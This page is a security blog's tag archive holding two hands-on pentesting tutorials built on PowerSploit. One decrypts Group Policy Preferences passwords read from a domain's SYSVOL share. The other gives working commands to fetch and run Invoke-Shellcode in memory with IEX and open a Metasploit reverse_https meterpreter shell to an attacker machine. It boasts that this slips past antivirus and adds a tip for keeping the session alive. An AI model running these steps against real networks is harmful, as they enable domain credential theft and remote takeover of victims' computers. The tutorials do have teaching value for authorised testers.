powersploit | ColeSec Security

Another tool that is part of the Powersploit toolkit mentioned earlier is Get-GPPPassword.

One way to add a user (or change a password) for many users in a domain is through Group Policy Preferences (GPP). This essentially adds a GPO to the domain with a username and an (encrypted) password for all the computers on the domain to grab and process. The problem here is that Microsoft actually published the AES symmetric encryption key it uses right on MSDN.

GPOs are available for any authenticated domain user to read via \\domain-name-here\SYSVOL share. In other words, any authenticated user (insider attack, spear phished creds, etc) can gain access to these credentials in cleartext. The GPPs with the passwords are usually located in \\domain\SYSVOL\domain\Policies\{*}\Machine\Preferences\Groups\Groups.xml

In 2012, Chris Campbell wrote up a very easy to use Powershell script to search for these GPOs, decrypt the passwords, and print out the cleartext credentials. The script has since been updated and uploaded to the Powersploit github repository.

In 2014, Microsoft finally issued the MS14-025 patch for this issue. However they didn’t want to break anyone’s current processes by removing bad GPOs, so they simply disabled the Username and Password boxes and left it to the user to remove the bad GPOs. Therefore, this attack vector will likely be very useful for a long time to come.

Setup Your Testbed

Testing this vulnerability in a controlled environment is difficult. It requires setting up a Windows domain and adding test users via GPP, which is beyond the scope of this blog. Just trust me – if your environment contains passwords, you will see them. The script will not do any harm – it is merely viewing the contents of GPO files, just like any other domain joined computer would.

Attack

How do I find a vulnerable host?

Check to see if your local system is joined to a domain. This can by done by right clicking on My Computer and clicking properties. If it lists a workgroup, then you are out of luck. If it lists a domain, then you’re in business.

How do you attack that host?

This is the easy part. Simply run Get-GPPPassword.ps1 from the command line, and everything else is done for you.

The script will automatically figure out your domain and go searching for GPOs with passwords. This may take a while because it is likely going across the network and searching.

These tasks can actually be split up and improved upon. First, copy all of the GPOs from the network location to a local location by copying the entire contents of \\domain\SYSVOL\domain\Policies (or if these files are very large in your domain, write a script to search for and only copy the relevant Groups.xml types of files). Now you can use a nifty script that Microsoft provides called Enum-SettingsWithCpassword. This script alone provides very little information, but it is easy to edit the end part with all the Add-Member lines to provide additional information. Here is what mine looks like:

Add-Member –membertype NoteProperty –name GPOName –value ($gpoName) –passthru | Add-Member -MemberType NoteProperty -name Owner -value ($gpoOwner) -passthru | Add-Member -MemberType NoteProperty -name UserName -value ($gpp.Name) -passthru | Add-Member -MemberType NoteProperty -name Password -value (Get-DecryptedCpassword($gpp.Properties.cpassword)) -passthru | Add-Member -MemberType NoteProperty -name Modified -value ($gpp.changed) -passthru | Add-Member -MemberType NoteProperty -name ChangeOnLogon -value ($gpp.Properties.changeLogon) -passthru | Add-Member -MemberType NoteProperty -name ChangeDisabled -value ($gpp.Properties.noChange) -passthru | Add-Member -MemberType NoteProperty -name NeverExpires -value ($gpp.Properties.neverExpires) -passthru | Add-Member -MemberType NoteProperty -name Disabled -value ($gpp.Properties.acctDisabled) -passthru | Add-Member -MemberType NoteProperty -name GUID -value ($gpoGuid) -passthru | Add-Member -MemberType NoteProperty -name Status -value ($gpoStatus) -passthru | Add-Member -MemberType NoteProperty -name Path -value ($prefLocation) -passthru | Add-Member -MemberType NoteProperty -name FilePath -value ($fileFullPath)

Notice that I also used the DecryptedCpassword utility (also provided on the same Microsoft page). Once your script is ready, I prefer to dump the contents into a CSV file. So the function would be run like this:

PS > Enum-SettingsWithCpassword("C:\Users\colesec\Desktop\GPOs") | Export-CSV C:\Users\colesec\Desktop\GPOsWithPass.csv

The other thing about this script is that it requires the GroupPolicy module for Powershell, which you probably don’t already have if you’re not running this from a Windows Server distribution. No fear though – this is just an easy, free download from Microsoft. Grab the Remote Server Administration Tools (RSAT), install, and you’re set. More info here.

Good luck!

Powershell has recently come into the spotlight as more than just a sysadmin tool, but a great cyber security tool. This was emphasized by many of the popular hacker cons this last year.

One incredibly useful tool is Powersploit. It is a set of powershell scripts put together (and in part written by) Matt Graeber.

In this post, we’re going to use the Invoke-Shellcode script from Powersploit to completely bypass antivirus and load up a meterpreter back to your server. Antivirus never catches it because it never actually hits the hard drive; everything stays in memory. Genius, right?

Setup Your Testbed

The victim machine needs to be any Windows machine. In this example, we’ll be using Windows 7 64-bit. You can even have an antivirus installed, and you will see that it never gets caught.

The victim machine also needs to download the Invoke-Shellcode.ps1 script from somewhere. In the examples below, we’ll just grab them straight from github. This isn’t always possible (or smart), so powersploit is also already available in Kali under /usr/share/powersploit. You can easily set up a temporary web server on port 8000 to download from by using the Python module SimpleHTTPServer:

$ cd /usr/share/powersploit $ python -m SimpleHTTPServer Serving HTTP on 0.0.0.0 port 8000 ...

And now you can use your Kali box instead.

You can also make sure you have the very latest powersploit scripts by cloning the archive:

$ git clone https://github.com/mattifestation/PowerSploit.git Cloning into 'PowerSploit'... remote: Counting objects: 1555, done. remote: Total 1555 (delta 0), reused 0 (delta 0), pack-reused 1555 Receiving objects: 100% (1555/1555), 5.94 MiB | 2.63 MiB/s, done. Resolving deltas: 100% (743/743), done.

Attack

How do you find a vulnerable host?

Any Windows machine with powershell installed should be vulnerable. You can tell that powershell is installed simply by entering the powershell prompt from the command line.

How do you attack that host?

First, you need to download the script and load it into memory. The trick here is that it never hits the hard drive, so antivirus doesn’t catch anything.

PS > IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/mattifestation/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1")

Note, you shouldn’t see any errors. Also note that if you see the following text: “Something terrible may have just happened and you have no idea what because you just arbitrarily download crap from the Internet and execute it.” – you need to download Invoke–Shellcode instead of Invoke-Shellcode. It seems the author is trying to make a point about downloading code.

Now that Invoke-Shellcode has been loaded, you can optionally find out more about it.

PS > Get-Help Invoke-Shellcode

All of the Powersploit scripts have very helpful Get-Help commands.

Now you need to setup the handler to catch the meterpreter payload. Start up Metasploit and begin your handler:

msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https msf exploit(handler) > set LHOST 192.168.1.6 msf exploit(handler) > set LPORT 4444 msf exploit(handler) > exploit

[*] Started HTTPS reverse handler on https://0.0.0.0:4444/ [*] Starting the payload handler...

Finally, you are ready to use Invoke-Shellcode on the victim:

PS > Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.6 -Lport 4444 -Force

You should have a meterpreter shell on your Kali machine:

msf exploit(handler) > exploit

[*] Started HTTPS reverse handler on https://0.0.0.0:4444/ [*] Starting the payload handler... [*] 192.168.1.5:49230 Request received for /INITM... [*] 192.168.1.5:49230 Staging connection for target /INITM received... [*] Patched user-agent at offset 663656... [*] Patched transport at offset 663320... [*] Patched URL at offset 663384... [*] Patched Expiration Timeout at offset 664256... [*] Patched Communication Timeout at offset 664260... [*] Meterpreter session 1 opened (192.168.1.6:4444 -> 192.168.1.5:49230) at 2015-03-05 11:35:10 -0500

meterpreter > getuid Server username: testcomp\colesec

As another tip, there is a fantastic post exploit module called post/windows/manage/smart_migrate. You can run it at this point to automatically migrate to another process, after which you can completely close the powershell window and still keep the meterpreter process running. You can even make the process run automatically in your handler setup by adding the command “set AutoRunScript post/windows/manage/smart_migrate”

References:

https://www.pentestgeek.com/2013/09/18/invoke-shellcode/
http://resources.infosecinstitute.com/powershell-toolkit-powersploit/ (great description of other powersploit scripts)
https://www.fishnetsecurity.com/6labs/blog/how-post-ex-persistence-scripting-powersploit-veil (cool tutorial on adding custom payloads and using persistence)

ColeSec Security

All things cyber security

Tag Archives: powersploit

Grabbing Passwords from your Domain Controller (GPP MS14-025)

Hacking with Powershell, Powersploit, and Invoke-Shellcode